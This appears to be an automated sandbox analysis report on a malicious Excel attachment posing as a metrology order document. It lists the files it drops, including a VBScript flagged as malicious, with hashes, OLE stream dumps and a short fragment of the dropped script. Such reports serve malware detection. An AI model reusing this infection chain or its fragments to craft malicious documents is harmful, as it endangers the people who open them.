                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):512
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3::
                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                              Malicious:false
                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\~DFFFB05C0FBE4321D2.TMP

                                                                                              Download File
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):512
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3::
                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                              Malicious:false
                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):140578
                                                                                              Entropy (8bit):3.695250393374824
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:bybqHgt5pz6GwnGF5MogA+Z4Pcofy4jJBvs15tidfr4xvZU1uv/q:bybqgt5peGwFAPc8j/E154dfrcvZUaq
                                                                                              MD5:A662B24242684290B46777977F7FBFB7
                                                                                              SHA1:E4CB41E0206EEC554B60C131BA807C6DD0ADB3C1
                                                                                              SHA-256:BE2BF60EAE60DF6FC37A5BFC23BB5E8BAB48BA0664D990B545FD4BEA239AFA0F
                                                                                              SHA-512:27602CEFCC3D29DC8BC0886B2E6BB7CF7BDB75E3B1ED56AB1F1047D8E4D8F18EB4AFB04F9028A80642FA2C4F8DA62C178CDDA23C863C4D0CF5D7C6C50905185B
                                                                                              Malicious:true
                                                                                              Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .p.i.n.g.a.d.o.)..... . . . .d.i.m. .b.o.m.b.a.r.d.e.i.o.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .b.o.m.b.a.r.d.e.i.o..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .b.o.m.b.a.r.d.e.i.o.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .=. .0..... .

                                                                                              C:\Users\user\Desktop\54330000

                                                                                              Download File
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 07:39:46 2024, Security: 1
                                                                                              Category:dropped
                                                                                              Size (bytes):1072128
                                                                                              Entropy (8bit):7.364562994960936
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:XmzHJEyfN1YpRBP539wZEDD3DERnLRmF8DGLtiovsNfrq45RqC0EG7fJXnoA17Vl:+hfgph3JDbARM8GkWTjLX
                                                                                              MD5:6E60BFB2C9138F4FC0E41C6BF9161A2C
                                                                                              SHA1:4478B5D78399B434802DD02ED70961DC7C5BA27B
                                                                                              SHA-256:4452434903A1D5B42BC590CFDBC49AA03667962FAA6D766B434660BD780CB92B
                                                                                              SHA-512:5BB74505E2E69576A2E392CCFAB4B356CE5986051B9856FACEF96435FE0577CE7A25EBF61C991ACD4839EDE0747A3A5EB12AEC0FE49272F95926EEB2A4EB4CE6
                                                                                              Malicious:false
                                                                                              Preview:......................>.......................................................................7...............................c.......e................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                              C:\Users\user\Desktop\54330000:Zone.Identifier

                                                                                              Download File
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:false
                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                              C:\Users\user\Desktop\A & C Metrology OC 5457144.xls (copy)

                                                                                              Download File
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 07:39:46 2024, Security: 1
                                                                                              Category:dropped
                                                                                              Size (bytes):1072128
                                                                                              Entropy (8bit):7.364562994960936
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:XmzHJEyfN1YpRBP539wZEDD3DERnLRmF8DGLtiovsNfrq45RqC0EG7fJXnoA17Vl:+hfgph3JDbARM8GkWTjLX
                                                                                              MD5:6E60BFB2C9138F4FC0E41C6BF9161A2C
                                                                                              SHA1:4478B5D78399B434802DD02ED70961DC7C5BA27B
                                                                                              SHA-256:4452434903A1D5B42BC590CFDBC49AA03667962FAA6D766B434660BD780CB92B
                                                                                              SHA-512:5BB74505E2E69576A2E392CCFAB4B356CE5986051B9856FACEF96435FE0577CE7A25EBF61C991ACD4839EDE0747A3A5EB12AEC0FE49272F95926EEB2A4EB4CE6
                                                                                              Malicious:true
                                                                                              Preview:......................>.......................................................................7...............................c.......e................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Oct 23 15:32:04 2024, Security: 1
                                                                                              Entropy (8bit):7.343322753419543
                                                                                              TrID:
                                                                                              • Microsoft Excel sheet (30009/1) 47.99%
                                                                                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                              File name:A & C Metrology OC 5457144.xls
                                                                                              File size:1'081'344 bytes
                                                                                              MD5:48c40411ba277f1c9829871605366dc0
                                                                                              SHA1:8e2a93e0bd4e23b655de720b5d75f1e01420c17e
                                                                                              SHA256:86e985895fb6d155d4d6c894c8d038b76f5e6db694ca0c59867ee43867d49f61
                                                                                              SHA512:ac3ae0cf032c844bbf70d46372726b76fd7264c8b5a8c2a68e6c4acefad9a43698e5839565a4e299af1543973d73e5f905a69297f8057ee44915269197e50cdc
                                                                                              SSDEEP:12288:TmzHJEyfN1YFuBPD39gZEpD3DERnLRmF8D9eaEc1flr/Wsnd3ZhSK:ChfgFI3lpbARM8Ze1WNrbp
                                                                                              TLSH:0E35AEC3A9198F66ED560234A6F3876E5324CC83C522472F22F4762879FB7D4245AF8D
                                                                                              File Content Preview:........................>.......................................................................7...............................c.......e......................................................................................................................

                                                                                              File Icon

                                                                                              Icon Hash:276ea3a6a6b7bfbf

                                                                                              Static OLE Info

                                                                                              General

                                                                                              Document Type:OLE
                                                                                              Number of OLE Files:1

                                                                                              OLE File "A & C Metrology OC 5457144.xls"

                                                                                              Indicators
                                                                                              Has Summary Info:
                                                                                              Application Name:Microsoft Excel
                                                                                              Encrypted Document:True
                                                                                              Contains Word Document Stream:False
                                                                                              Contains Workbook/Book Stream:True
                                                                                              Contains PowerPoint Document Stream:False
                                                                                              Contains Visio Document Stream:False
                                                                                              Contains ObjectPool Stream:False
                                                                                              Flash Objects Count:0
                                                                                              Contains VBA Macros:True
                                                                                              Summary
                                                                                              Code Page:1252
                                                                                              Author:
                                                                                              Last Saved By:
                                                                                              Create Time:2006-09-16 00:00:00
                                                                                              Last Saved Time:2024-10-23 14:32:04
                                                                                              Creating Application:Microsoft Excel
                                                                                              Security:1
                                                                                              Document Summary
                                                                                              Document Code Page:1252
                                                                                              Thumbnail Scaling Desired:False
                                                                                              Contains Dirty Links:False
                                                                                              Shared Document:False
                                                                                              Changed Hyperlinks:False
                                                                                              Application Version:786432

                                                                                              Streams with VBA

                                                                                              VBA File Name: Sheet1.cls, Stream Size: 977
                                                                                              General
                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                              VBA File Name:Sheet1.cls
                                                                                              Stream Size:977
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Y x . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 59 84 78 ea 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              VBA Code
                                                                                              Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                              VBA File Name: Sheet2.cls, Stream Size: 977
                                                                                              General
                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                              VBA File Name:Sheet2.cls
                                                                                              Stream Size:977
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Y . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 59 84 c3 ac 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              VBA Code
                                                                                              Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                              VBA File Name: Sheet3.cls, Stream Size: 977
                                                                                              General
                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                              VBA File Name:Sheet3.cls
                                                                                              Stream Size:977
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Y . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 59 84 e5 f7 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              VBA Code
                                                                                              Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                              VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                                                              General
                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                              VBA File Name:ThisWorkbook.cls
                                                                                              Stream Size:985
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Y p a . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 59 84 70 61 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              VBA Code
                                                                                              Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                              Streams

                                                                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                              General
                                                                                              Stream Path:\x1CompObj
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:114
                                                                                              Entropy:4.25248375192737
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                                                              General
                                                                                              Stream Path:\x5DocumentSummaryInformation
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:244
                                                                                              Entropy:2.889430592781307
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                                                              General
                                                                                              Stream Path:\x5SummaryInformation
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:200
                                                                                              Entropy:3.2403503175049817
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . X T X % . . . . . . . . .
                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                              Stream Path: MBD0026E5D5/\x1CompObj, File Type: data, Stream Size: 114
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/\x1CompObj
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:114
                                                                                              Entropy:4.25248375192737
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Stream Path: MBD0026E5D5/\x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/\x5DocumentSummaryInformation
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:244
                                                                                              Entropy:2.701136490257069
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                                                                              Stream Path: MBD0026E5D5/\x5SummaryInformation, File Type: dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", Stream Size: 90976
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/\x5SummaryInformation
                                                                                              CLSID:
                                                                                              File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"
                                                                                              Stream Size:90976
                                                                                              Entropy:4.0202822243037755
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . 0 c . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . % . . . . . . . . . G . . . t b . . . . . . . . u . 2 . . . . . . . . . 2 . . . . ! . . . . . . . . . . v . . . ! . . A . . .
                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 30 63 01 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 70 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00
                                                                                              Stream Path: MBD0026E5D5/MBD0002578E/\x1CompObj, File Type: data, Stream Size: 114
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD0002578E/\x1CompObj
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:114
                                                                                              Entropy:4.219515110876372
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Stream Path: MBD0026E5D5/MBD0002578E/Package, File Type: Microsoft Excel 2007+, Stream Size: 33181
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD0002578E/Package
                                                                                              CLSID:
                                                                                              File Type:Microsoft Excel 2007+
                                                                                              Stream Size:33181
                                                                                              Entropy:7.705040299215262
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:P K . . . . . . . . . . ! . ) ; . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 e2 9b 29 3b aa 01 00 00 e0 07 00 00 13 00 ce 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 ca 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Stream Path: MBD0026E5D5/MBD00032715/\x1CompObj, File Type: data, Stream Size: 99
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD00032715/\x1CompObj
